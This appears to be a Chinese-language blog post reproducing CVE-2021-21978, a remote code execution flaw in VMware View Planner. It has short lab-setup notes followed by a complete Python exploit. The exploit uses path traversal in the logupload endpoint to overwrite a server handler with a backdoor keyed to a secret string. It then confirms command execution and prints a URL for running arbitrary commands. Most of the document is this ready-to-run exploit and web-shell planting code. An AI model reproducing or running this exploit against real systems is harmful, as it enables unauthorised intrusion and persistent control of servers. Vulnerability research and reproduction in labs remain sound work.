CVE-2021-21978:VM View Planner RCE 漏洞复现
环境地址:
https://my.vmware.com/en/group/vmware/downloads/details?downloadGroup=VIEW-PLAN-460&productId=1067&rPId=53394
打开vm Workstation 选择打开文件进行导入
然后就是等待了
等待大概一分钟之后就可以启动机器
等个10分钟。。。
EXP:
# -*- coding: utf-8 -*- # @Time : 2021/3/5 下午1:38 # @Author : skytina # @File : CVE-2021-21978.py import requests,json,sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(url): payload_fname = 'upload.txt' logMetaData = { "itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload", "logFileType":"log_upload_wsgi.py", "workloadID":"2" } vul_path = '/logupload?logMetaData={logMetaData}'.format( logMetaData=json.dumps(logMetaData) ) # with open('./upload.txt','r') as f: # with open(payload_fname,'w+') as wf: # command_to_execute = "{command} > /etc/httpd/html/logs/.debug.log"\ # .format(command=command) # content = f.read() # content_w = content.replace( # "{command_to_execute}",command_to_execute # ) # wf.write(content_w) req_url = "{url}{vul_path}".format( url = url, vul_path = vul_path ) files = { "logfile":open(payload_fname,"r") } try: r = requests.post(req_url,files=files,verify=False) #print(r.content.decode()) cmd_r = cmd(url,'echo "NiuNiu2020" |base64') #print(cmd_r) if "Tml1Tml1MjAyMAo=" in str(cmd_r): return True else: return False except Exception as e: print(str(e)) return False def cmd(url,command): cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format( url=url, command=command ) try: resp = requests.get(cmd_url,verify=False) return resp.content.decode() except Exception as e: return str(e) def usage(): help = "[*] python3 CVE-2021-21978.py url\n\tpython3 CVE-2021-21978.py https://192.168.80.3" print(help) #exploit('https://192.168.80.3','whoami') if __name__ == "__main__": if len(sys.argv) < 2: usage() else: url = sys.argv[1] if url.startswith("http://") or url.startswith("https"): if exploit(url): cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format( url=url, command="command" ) outmsg = "[*]{url} is vulnerable\n[*]You can execute command like This: {cmd_url}".format( url = url, cmd_url=cmd_url ) print(outmsg) else: usage()
参考文章:https://mp.weixin.qq.com/s/bTTOLjslwq1RiuB8Ah2Y9Q